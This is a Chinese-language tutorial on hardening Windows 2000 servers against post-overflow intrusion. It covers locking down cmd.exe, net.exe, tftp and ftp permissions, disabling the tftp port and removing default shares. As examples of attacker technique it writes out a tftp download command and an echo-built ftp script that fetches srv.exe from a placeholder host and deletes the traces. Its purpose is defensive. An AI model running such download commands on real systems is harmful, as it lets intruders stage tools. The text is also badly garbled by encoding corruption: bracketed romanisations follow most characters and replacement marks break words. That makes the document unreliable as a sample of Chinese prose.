無(wú)可否認(rèn)，溢出攻擊無(wú)論是對(duì)黑客，或者安全檢測(cè)人員來說，都是對(duì)一臺(tái)主機(jī)測(cè)試的時(shí)候所會(huì)采取的手段，因?yàn)橐绯龉�擊如果成功的話，可以令我們迅速獲取對(duì)方主機(jī)的一定權(quán)限。

　　但是，我們利用溢出就開心，但是網(wǎng)管呢，他可就慘了，尤其是一臺(tái)專門用來保護(hù)重要數(shù)據(jù)的主機(jī)如果給一些無(wú)良黑客，或應(yīng)該說是駭客吧，他們?nèi)肭趾螅�大�?a target="_blank">刪除數(shù)據(jù)，無(wú)論你有沒有備份數(shù)據(jù)，損失都是十分嚴(yán)重的，所以有效地打補(bǔ)丁倒也是一個(gè)好方法，但是，有時(shí)候你忘記了呢?或者不知道呢，又或者對(duì)方用的是0day Exploit呢!所以打補(bǔ)丁是有效，但不是唯一的方法。但是我卻在看某安全雜志的時(shí)候，有一個(gè)牛人說到給cmd.exe設(shè)置權(quán)限，可以有效地防止溢出，再加上我和一些高手交流的時(shí)候，說到這個(gè)，他們也說理論上可以行得通，但是他們卻叫我試試。

　　好了，不再?gòu)U話了，下面說說怎么防止溢出。各位網(wǎng)管可要看仔細(xì)啦!

　　首先，我們可以建立一個(gè)用戶，名字就叫CmdUser,密碼就設(shè)置強(qiáng)壯一點(diǎn)，而且如果你追求完美的話，可以在用戶的名稱前面加上一個(gè)$.按照網(wǎng)上所公布的方法，建立一個(gè)隱藏帳戶，這樣，就算給人入侵了，也不會(huì)使用net user cmduser passworld  來修改這個(gè)用戶的密碼。記住哦，那個(gè)用戶必須是user等級(jí)的哦!

　　建立了用戶后，來到c:\winnt\system32,(這里系統(tǒng)安裝在C盤).找到cmd.exe,用右鍵打開屬性，在安全那里，如圖一所示

圖1

　　我們所要做的就是把所有的用戶刪除，然后添加CmdUser這個(gè)用戶，完成后就確定就可以了，但是不要以為這樣就可以了哦，還要找到net.exe這個(gè)按照cmd.exe的方法來設(shè)置，估計(jì)大家找到了net.exe的時(shí)候，發(fā)現(xiàn)旁邊還有一個(gè)net1.exe,這個(gè)也要設(shè)置哦，設(shè)置好了，不要以為松了一口氣，其實(shí)這樣雖然可以對(duì)付一些菜鳥黑客，但是，如果對(duì)方是老鳥來的話，他可以通過tftp，或者ftp等等來傳輸一個(gè)本地溢出的溢出程序，我們就game over了，或者他上傳一個(gè)木馬，利用替換服務(wù)這個(gè)方法呢，這個(gè)倒也是令人防不勝防啊!

　　可能讀者就要問了，你既然提出來，是不是有方法解決啊，不錯(cuò)!也算是一點(diǎn)點(diǎn)方法啦，下面就先說說tftp的方法，這個(gè)很簡(jiǎn)單的，進(jìn)入C:\WINNT\system32\drivers\etc，用記事本打開services這個(gè)文件，如圖2所示

圖2

　　把tftp這個(gè)端口修改為0。這樣，入侵著就不會(huì)通過使用tftp –I Host get files.exe文件來達(dá)到傳輸自己的工具。當(dāng)然，為了更好的安全性，我們可以通過搜索tftp.exe這個(gè)文件，然后把tftp這個(gè)執(zhí)行文件按照cmd。exe那樣，添加成為只有cmduser這個(gè)用戶才可以使用。下面就再說說另外一個(gè)方法。

　　我相信，大家應(yīng)該還記得一個(gè)使用echo命令來利用ftp來下載東西的命令吧，什么?你不知道?我來說一下：
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt
 
ftp -s:ftp.txt
del ftp.txt
　　這樣就可以把srv.exe這個(gè)軟件下載了，我們也可以按照cmd的方法，通過把ftp的使用權(quán)限分配給cmduser，這樣的話，就可以避免給對(duì)方上傳軟件了，其實(shí)還是有很多方法可以上傳的，但是我還是留下了一些思路給讀者，因?yàn)椋�只有這樣，我們才可以提高自己的技術(shù)。另外呢，可能有些朋友可能會(huì)利用以下這么一個(gè)腳本來關(guān)閉ipc$默認(rèn)共享：
@echo off
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share ipc$ /del
net share admin$ /del
@cls
　　但是我們這樣設(shè)置的話，可能會(huì)令到他們覺得很麻煩，所以，我們是不是可以在最后面那里加上一個(gè) net start explorer ,然后做成開機(jī)腳本，這樣可能會(huì)好一點(diǎn)。